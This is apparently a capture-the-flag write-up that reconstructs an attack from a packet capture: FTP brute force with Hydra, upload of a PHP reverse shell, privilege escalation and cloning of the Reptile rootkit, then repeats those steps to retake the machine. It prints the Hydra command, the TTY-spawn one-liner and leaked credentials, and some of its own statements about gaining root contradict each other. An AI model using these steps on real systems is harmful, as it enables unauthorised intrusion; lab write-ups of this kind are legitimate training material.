It seems like our machine got hacked by an anonymous threat actor. However, we are lucky to have a .pcap file from the attack. Can you determine what happened? Download the .pcap file and use Wireshark to view it.

# Tasks
* Service attacker tried to log in
* Name of tool for brute force (Van Hauser)
* Username attack used
* Compromised username password
* Directory in FTP that attacked logged in
* Filename of backdoor
* URL of the uploaded file
* Command attacker used after shell
* Hostname of computer
* Command attacker executed to spawn TTY shell
* Command to gain root shell
* Download from github
* Type of backdoor
* Become root
* flag.txt

# Vulnerabilities

# Analyzing
Looking at the pcap file, it looks like a lot of traffic was going to port 21 or more known as FTP (File Transfer Protocol). Looks like the attacker was trying to brute force the login using Hydra which is famous tool for brute-forcing as user Jenny.

Let's take a look at the TCP stream to see if we can find what password he successfully used to enter the server.
```txt
  

220 Hello FTP World!

USER jenny

331 Please specify the password.

PASS 111111

530 Login incorrect.

USER jenny

331 Please specify the password.

PASS password123

230 Login successful.
```
A weak password indeed. Now let's see what PWD was the attacker in after logging in, let's follow the TCP stream more.
```txt
  
220 Hello FTP World!

USER jenny

331 Please specify the password.

PASS password123

230 Login successful.

SYST

215 UNIX Type: L8

PWD

257 "/var/www/html" is the current directory

PORT 192,168,0,147,225,49

200 PORT command successful. Consider using PASV.

LIST -la

150 Here comes the directory listing.

226 Directory send OK.

TYPE I

200 Switching to Binary mode.

PORT 192,168,0,147,196,163

200 PORT command successful. Consider using PASV.

STOR shell.php

150 Ok to send data.

226 Transfer complete.

SITE CHMOD 777 shell.php

200 SITE CHMOD command ok.

QUIT

221 Goodbye.
```
Looks like we're in a web server, so it's /var/www/html
Now let's see what the attacker uploaded after seeing it's in /var/www/html
```txt
YPE I

200 Switching to Binary mode.

PORT 192,168,0,147,196,163

200 PORT command successful. Consider using PASV.

STOR shell.php

150 Ok to send data.

226 Transfer complete.

SITE CHMOD 777 shell.php

200 SITE CHMOD command ok.
```
shell.php looks pretty malicious to me.
Now let's see where the attacker downloaded the file, let's follow the TCP stream more.
```php
  

// Limitations

// -----------

// proc_open and stream_set_blocking require PHP version 4.3+, or 5+

// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.

// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.

//

// Usage

// -----

// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.  

// Limitations

// -----------

// proc_open and stream_set_blocking require PHP version 4.3+, or 5+

// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.

// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.

//

// Usage

// -----

// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
```
Looks like it's using pentestmonkey's php reverse shell, a pretty well known php reverse shell. 
Let's go further down the stream to see what happens after he gets a shell.
```bash
Linux wir3 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

jenny tty1 - 20:06 37.00s 1.00s 0.14s -bash

uid=33(www-data) gid=33(www-data) groups=33(www-data)

/bin/sh: 0: can't access tty; job control turned off

$ whoami

www-data

$ ls -la

```
I think it's pretty standard for attackers/hackers to run whoami after getting a reverse shell to see what user it is to check for privileges. The hostname should be right on the first line or after the username in the shell.

Now, the attacker should be upgrading his shell to a better one for command completion and all of that good stuff.
```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

Using the password that the attacker compromised from user Jenny, he was able to gain root by using the password.
```bash
www-data@wir3:/$ su jenny
su jenny
Password: password123
```
After getting root, looks like the attacker is setting up a backdoor to maintain access to the machine
```  

root@wir3:~# git clone https://github.com/f0rb1dd3n/Reptile.git

git clone https://github.com/f0rb1dd3n/Reptile.git
```
Let's take a look at that exploit.
It's a hidden backdoor that can't be detected by process, this more known as a rootkit.
Now that we all have the information, let's hack back in

# Taking back what is ours
## Recon
### NMAP SCN
```nmap
PORT   STATE SERVICE REASON  VERSION                                            
21/tcp open  ftp     syn-ack vsftpd 2.0.8 or later                                    80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu)) 
```
That's weird port 22 isn't open, while nmap is scanning for all ports, let's replicate what the attacker did with the FTP service, perhaps the attacker changed to a weak password too.
```bash
hydra -l Jenny -P /opt/wordlists/rockyou.txt 10.10.142.131 ftp
```
Like expected a weak password also by the attacker
```bash
[21][ftp] host: 10.10.142.131   login: jenny   password: 987654321
```
Now you could just upload a reverse shell of your own, but lets just change the values of the IP and port for the sake of the room challenge. Now let's upload our shell and listen on the designated port.
Now let's test it out, but unfortunately, it doesn't work. Let's check out the steps of the attacker again if we missed anything.
```txt
CHMOD 777 shell.php
```
Forgot to set the permissions on the shell.
And let's try that again.
```bash
Linux wir3 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 05:39:03 up 26 min,  0 users,  load average: 0.00, 0.11, 0.29
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
```
And we're in!
Let's try to upgrade to user jenny using the FTP password
```bash
www-data@wir3:/$ su jenny 
Password: 
jenny@wir3:/$ ls
```
And now we got it.
Now let's check out sudo -l to see if we can run anything as sudo.
```bash
[sudo] password for jenny: 
Matching Defaults entries for jenny on wir3:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jenny may run the following commands on wir3:
    (ALL : ALL) ALL
```
And looks like we have all permissions. Let's upgrade to root.
```bash
jenny@wir3:/$ sudo su
root@wir3:/#
```
No password needed and root!
Now grab flag.txt in /root/Reptile and solve the room.


